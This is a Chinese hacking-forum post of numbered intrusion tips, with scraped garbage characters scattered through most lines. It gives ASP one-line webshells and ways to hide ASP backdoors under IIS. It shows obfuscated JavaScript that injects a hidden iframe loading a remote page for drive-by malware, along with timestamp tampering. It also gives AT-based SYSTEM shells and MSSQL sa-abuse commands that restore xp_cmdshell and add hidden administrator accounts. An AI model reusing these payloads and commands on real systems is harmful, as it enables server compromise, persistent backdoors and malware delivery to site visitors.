1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!3 E8 [, d" p3 `6 \
2,打开盘符用右键打开!切忌双击盘符~9 b! B: l" O* _7 q  i$ r! ]
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
) }& Y' i3 p& q( u( ]! R# Q
( D7 a3 e9 Q' D# x9 W5 K; U1 V51、log备份时的一句话木马:
( m% p% A/ @( K( u/ y( ta).<%%25Execute(request("go"))%%25>: J5 n# ?7 y" Q# h! g
b).<%Execute(request("go"))%>
- ?! M" a/ a4 \3 [! u. m% lc).%><%execute request("go")%><%; ~  i  j1 l7 Z6 k$ k2 _- A8 r; b
d).<script language=VBScript runat=server>execute request("sb")</Script>
) Q3 w& V- N; ?e).<%25Execute(request("l"))%25>0 }  y* S) ]: p3 J5 q4 f" _
f).<%if request("cmd")<>"" then execute request("pass")%>4 |7 R" ]$ s# T7 r4 S' o& K) L

  S; S- f$ o7 |, q3 ~, P, `8 N52、at "12:17" /interactive cmd
1 P# l/ [  O2 D# h2 }7 Z0 }4 _执行后可以用AT命令查看新加的任务
7 P% W8 @! M$ [9 y' [用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
- v* e% m/ Q' N9 ?
- J/ b" p$ ]/ Q6 p" s( S53、隐藏ASP后门的两种方法
' [0 E: t, s- L: U: ^1、建立非标准目录:mkdir images..\
& I" ^2 }) O1 K拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp1 L+ u! M. k* H4 c
通过web访问ASP木马:http://ip/images../news.asp?action=login
, y: h2 j, x+ V& F如何删除非标准目录:rmdir images..\ /s
1 Q! G8 H  c* p9 x" H  h- V2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
1 Y; P1 w6 @+ f2 N1 w# }* {$ {3 rmkdir programme.asp! O% G  Y$ l5 f+ Q5 u
新建1.txt文件内容:<!--#include file=”12.jpg”-->& M, I; r. v0 z, j: i* E
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
6 l5 U# W2 v+ y: S" U2 Dattrib +H +S programme.asp4 ]; Z  G* q4 a3 r" H$ a
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt! y# _. W9 G& t3 j# d7 S9 C' \
- s6 {+ _% Y$ s! p3 ]
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。; ~0 u4 M* N# R6 ?+ C
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。2 V& H) v9 [; b# W7 W, r
9 i0 C8 C' Y5 R3 q8 x7 X; j
55、JS隐蔽挂马
+ S$ t, v8 i6 j' d1.+ x1 |( N0 n( [5 Y
var tr4c3="<iframe src=ht";- x1 c1 x# M% O9 `0 a0 @$ G/ Z! T, d
tr4c3 = tr4c3+"tp:/";9 F" \- e$ h6 |) d4 w# y
tr4c3 = tr4c3+"/ww";
4 i2 j. G( p4 _; N' S; xtr4c3 = tr4c3+"w.tr4";
' K3 t7 c& X. r1 k% r# f5 `6 k1 B% Utr4c3 = tr4c3+"c3.com/inc/m";
1 M1 A9 Q/ U- I. t% M, dtr4c3 = tr4c3+"m.htm style="display:none"></i";, `$ Y  h6 r* R0 c5 B- |4 k, c" z
tr4c3 =tr4c3+"frame>'";" y4 P# {, ?! y* q
document.write(tr4c3);
; G6 b9 o4 x! O. E5 U' p' ?避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。- w! F# W3 h1 t( r

! W/ J' P. A* N; I& C2 p+ J2 H2.
; W% R! Y# X. N/ T2 ?转换进制,然后用EVAL执行。如
1 I( B- e" |3 o3 |1 I0 }* jeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");' R" C) Z8 x. T; H0 P. `1 o  S
不过这个有点显眼。! t. B/ Q# q6 e" W0 u
3.
  `' @3 J. {, b9 ]* z, ldocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');) M. n' x/ {% r7 g* X- w
最后一点,别忘了把文件的时间也修改下。
; ]  D8 b# p( f, c) B
& T9 f" f2 h5 s. R6 |/ c56.3389终端入侵常用DOS命令
1 l3 e7 y5 m- p! staskkill taskkill /PID 1248 /t
" t! ?; F% K; Z" Y8 f2 z8 }0 A& p8 w- l( \( q# j5 o
tasklist 查进程
+ X! x- k- E& J- N+ `, b
, x" P# d. B- U1 R, ^" wcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限6 d  I5 O* z( n- t
iisreset /reboot
: h$ k- `& V- J, `4 j' j9 h9 Qtsshutdn /reboot /delay:1    重起服务器3 V9 M- E8 _' T$ m/ D1 Y2 H+ V

9 t/ H) W: o' M/ Zlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
/ ~) ]4 ?5 V0 e1 O" \4 ^, }  j$ r$ {$ W
query user 查看当前终端用户在线情况4 |, G3 A  d  F$ l

% r$ P; J: {, |! i) u要显示有关所有会话使用的进程的信息,请键入:query process *4 a) E& ]) t, ?8 U
+ y  G+ v% U& g2 g+ d! b; C6 e
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
, F1 t% A8 \' E* ^8 s) \8 Z3 j: q) I* y" ]
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2" g/ y  [& a0 }9 Z* t6 X" T
* X2 _: P2 w* V# n: |
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02" d4 {) q- V. {
' w, I- e6 K$ U1 [% O
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启1 [5 ]; Y7 @) P) S; M

" G$ c3 I+ S5 K; R$ q; J命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
, u' ?- Z2 @& ?: a3 k% c$ r, o- T% _, E! B0 q
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。; ^& p: E  k2 z3 N2 v

; B& _, Y9 `  n. `命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
8 b0 ~, ]/ z+ h
1 y3 ^- T) d( ?3 S6 A! \$ |56、在地址栏或按Ctrl+O,输入:! \# ^% z: m6 q* J' x) B  z! Z# P% i
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
$ R# o+ u5 s: s# M% D2 ~+ s( d3 q- B! A7 M7 |
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。- A( o$ r/ T6 r6 l( O2 M

3 }3 L6 b! U0 v6 I* o4 i# a8 ~& j57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
, G  Q! t" F, b6 X# w+ P) ?. @用net localgroup administrators是可以看到管理组下,加了$的用户的。6 D" N1 z* h6 L/ P3 ^9 Y

: E  @% J& B0 k) Y' u( w$ [3 ~58、 sa弱口令相关命令
6 Y0 @) d; A3 O' j; I6 L. b* E5 J  z2 Z# B, O" m( m4 L
一.更改sa口令方法:
% c$ m/ [1 p# h/ g4 ?% }7 j, D8 [用sql综合利用工具连接后,执行命令:
' }) m3 }0 e+ h1 L4 J' hexec sp_password NULL,'20001001','sa') Q/ \* ^2 X0 Q
(提示:慎用!)0 X$ j0 T& e, \7 B3 ]

! M+ A1 T. t0 F2 O1 Q5 r; A二.简单修补sa弱口令.0 N5 U' s  E5 _/ v2 _% Z
& \7 e" {1 J/ ?8 h6 M* Z! ^( s+ z
方法1:查询分离器连接后执行:
* D$ m$ K$ E  R5 P+ x! gif exists (select * from
  D8 V1 K0 Z2 g! @2 H) Ldbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and8 m% G! n9 L' l# I; A1 z
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)9 y$ L" H! t( c1 g/ d
% O. \! ?9 l6 S8 z
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'" C+ l* s- J; ~0 h/ ~8 L
0 O- w' s2 K$ |& W2 W) S# u
GO0 a4 p! r$ D% j2 H/ P  Q: c9 C7 C. ]
  Z7 O  ~0 k6 [  H, R6 b
然后按F5键命令执行完毕; E' O0 W" g. c
6 P) k0 X1 ?% @" _" n
方法2:查询分离器连接后
! F' ~* W2 n1 H- r6 `7 z2 W第一步执行:use master
7 @! F2 H7 _. i/ ^% z% D第二步执行:sp_dropextendedproc 'xp_cmdshell'
, R9 Q' [! \2 L2 W* }! B* X: M1 [然后按F5键命令执行完毕
( b' k8 F1 K  f6 J7 w) o' B4 i4 B( v! v2 M; F* D
# m9 e+ z! i0 G9 f8 s0 W
三.常见情况恢复执行xp_cmdshell.
- t. E3 t9 G3 n' z6 j, e# ?# ~! {( Z6 J: a
0 f8 @3 A! \9 W) U
1 未能找到存储过程'master..xpcmdshell'.- e7 L$ `0 L" z
   恢复方法:查询分离器连接后," K/ e% {( L& `
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
! N+ F. J2 t2 V+ f" p第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
; U6 ^$ u  x1 g& R然后按F5键命令执行完毕
' z+ b7 S5 |' L( l
, Q' i8 b- b3 M0 q: K; M, y$ J2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)' f; F2 m; M1 Q9 M; L+ y/ g
恢复方法:查询分离器连接后,8 v# @! v4 w" Y
第一步执行:sp_dropextendedproc "xp_cmdshell"9 H9 m0 v- j0 p7 D; P9 d
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'& b# X# y( V9 W3 s. Z: Q; l2 @
然后按F5键命令执行完毕: c. Y: o4 g1 Q2 F3 j

2 P$ I$ q& b, D0 f6 v8 I3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)) r( j" ~: G  r
恢复方法:查询分离器连接后,( G6 r' y) G% W+ i* [, N
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
- h# p: P, E1 N( H/ x第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
( j1 n! u* j6 N: x然后按F5键命令执行完毕" m5 W4 C6 P# g0 Z

/ p, z2 Y7 F( z2 N/ V四.终极方法." X" M, b2 ^, [8 d2 j9 _
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:7 T: x) i- x3 M- I7 c7 c5 N6 G
查询分离器连接后,8 p/ @% }) P( h
2000servser系统:
% ]5 m1 B( L2 ?) \$ udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
5 F% N2 C# |7 U. j. {! \
3 E7 A4 B$ A$ D9 V$ }declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
2 C; G, Q6 {5 |  C  l# o1 v1 d2 ?$ `
xp或2003server系统:! F" K7 T* i% I7 G! J/ B" ]/ p' x+ E

% R2 h0 Z4 A1 O  p, S; C* M0 h& Hdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'5 r$ a) I1 `+ e6 N$ |
. E" R# U# {& A: b0 i, j
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. j/ w, b/ `# q4 W4 k3 ?' g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表